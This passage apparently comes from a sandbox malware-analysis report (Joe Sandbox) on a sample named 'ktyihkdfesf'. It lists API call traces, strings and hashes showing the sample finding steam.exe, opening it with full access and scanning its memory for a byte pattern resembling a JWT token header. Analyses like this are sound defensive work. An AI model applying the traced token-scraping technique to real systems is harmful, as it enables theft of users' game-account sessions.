                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411ED0: Process32Next.KERNEL32(00000000,?), ref: 00411F12
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411ED0: StrCmpCA.SHLWAPI(?,?), ref: 00411F1E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FD50: ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0040FD6D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FD50: OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040FD94
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FD50: memset.MSVCRT ref: 0040FDB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FD50: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040FDF1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FD50: ReadProcessMemory.KERNEL32(00000000,00000000,?,00000208,00000000,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73,-00000208,?,FFFFFFFF,00000FFF,?,?), ref: 0040FE56
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FD50: strlen.MSVCRT ref: 0040FE67
                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(?,?,00000000,steam.exe), ref: 00410070
                                                                                                                                                                                                                                                                                                  • strcpy.MSVCRT(00000000,?,steam.exe), ref: 00410089
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,steam.exe), ref: 004100BF
                                                                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,steam.exe), ref: 004100D1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ??3@ProcessProcess32$CreateFirstMemoryNextOpenReadSnapshotToolhelp32_invalid_parameter_noinfo_noreturnmemsetstrcpystrlen
                                                                                                                                                                                                                                                                                                  • String ID: steam.exe
                                                                                                                                                                                                                                                                                                  • API String ID: 3498801153-2826358650
                                                                                                                                                                                                                                                                                                  • Opcode ID: edf7ab5e709519ca9690a9e51a5b00c792588e82c5ef7c00e0374f79e830f1f4
                                                                                                                                                                                                                                                                                                  • Instruction ID: c95efb34c5d0572b28db4c51e5027ad35194888a113b08cfb57a14cf0263e5e6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: edf7ab5e709519ca9690a9e51a5b00c792588e82c5ef7c00e0374f79e830f1f4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4F0F9B1A003082BEA10753A7CC5AFB7948DA55758F040537FD5597342F59B8CD402BA
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0041D784
                                                                                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041D78E
                                                                                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041D7A9
                                                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D80E
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 568878067-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 75b2103738ecdde49953f6b06e7d75b5bbde3c112b22eec6627f6643067b6ab9
                                                                                                                                                                                                                                                                                                  • Instruction ID: 931dc2256524a03f6c6b52008fe1b6fe3cfd9aca74429015198684bf78445e10
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75b2103738ecdde49953f6b06e7d75b5bbde3c112b22eec6627f6643067b6ab9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0318BB2904B109AE329CF29C8547B7BBE4FF84340F008A2EF5D69A250E779E485DB55
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                  • GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890, xrefs: 004113C9
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: SystemTimelstrcpylstrlen
                                                                                                                                                                                                                                                                                                  • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                                                                                                                                                                                                                                                                                                  • API String ID: 3844799746-2529986050
                                                                                                                                                                                                                                                                                                  • Opcode ID: 066908f056dc1f1dbb91ebc683ebbcf5ffb8e290bff7efcc6e8575583ae2dc61
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0ad9b0325b1aa92503a801a233b5e7783d800f0c675173fcafeea2b792c599d4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 066908f056dc1f1dbb91ebc683ebbcf5ffb8e290bff7efcc6e8575583ae2dc61
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F110330304200ABC704AB76A81667FB7A7EBC5304F45507EF442C73A1DE389C8087A5